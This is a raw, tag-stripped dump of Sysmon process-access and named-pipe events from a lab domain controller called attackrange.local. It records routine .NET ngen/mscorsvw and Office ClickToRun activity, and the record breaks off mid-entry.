14:58:03.170{A7A01FEF-B624-607E-0500-00000000BB01}644660C:\Windows\system32\csrss.exe{00000000-0000-0000-0000-000000000000}5424C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000077704Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:03.170{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{00000000-0000-0000-0000-000000000000}5424C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 18141800x800000000000000077703Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:03.139{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077702Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:03.139{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 10341000x800000000000000077701Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:03.123{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EBFB-607E-050E-00000000BB01}4708C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 18141800x800000000000000077700Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:03.123{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077699Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:03.123{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077698Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:03.123{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077697Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:03.123{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077696Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:03.123{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077695Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:03.123{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077694Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:03.123{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077693Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:03.123{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077692Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:03.123{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077691Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:03.123{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077690Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:03.123{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077689Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:03.123{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077688Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:03.123{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077687Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:03.123{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077686Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:03.123{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077685Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:03.123{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077684Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:03.123{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077683Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:03.123{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077682Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:03.123{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077681Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:03.123{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077680Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:03.123{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077679Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:03.123{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077678Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:03.123{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077677Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:03.123{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077676Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:03.123{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077675Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:03.123{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077674Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:03.123{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077673Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:03.123{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077672Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:03.123{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077671Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:03.123{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077670Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:03.123{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077669Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:03.123{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077668Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:03.123{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077667Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:03.123{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077666Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:03.123{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077665Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:03.123{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077664Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:03.123{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077663Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:03.123{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077662Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:03.123{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077661Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:03.123{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077660Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:03.123{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077659Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:03.123{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077658Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:03.123{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077657Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:03.123{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077656Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:03.123{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077655Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:03.123{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077654Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:03.123{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077653Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:03.123{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077652Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:03.123{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077651Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:03.123{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077650Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:03.123{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077649Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:03.123{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077648Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:03.123{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077647Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:03.123{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077646Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:03.123{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 10341000x800000000000000077645Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:03.107{A7A01FEF-B624-607E-0500-00000000BB01}6442236C:\Windows\system32\csrss.exe{00000000-0000-0000-0000-000000000000}4708C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000077644Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:03.107{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{00000000-0000-0000-0000-000000000000}4708C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 18141800x800000000000000077643Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:03.092{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077642Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:03.076{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077641Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:03.076{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\FTA_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077640Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:03.076{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 10341000x800000000000000077639Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:02.982{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EBFA-607E-030E-00000000BB01}6372C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000077638Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:02.967{A7A01FEF-B624-607E-0500-00000000BB01}644760C:\Windows\system32\csrss.exe{00000000-0000-0000-0000-000000000000}6372C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000077637Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:02.967{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{00000000-0000-0000-0000-000000000000}6372C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 18141800x800000000000000077636Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:02.951{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 10341000x800000000000000077635Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 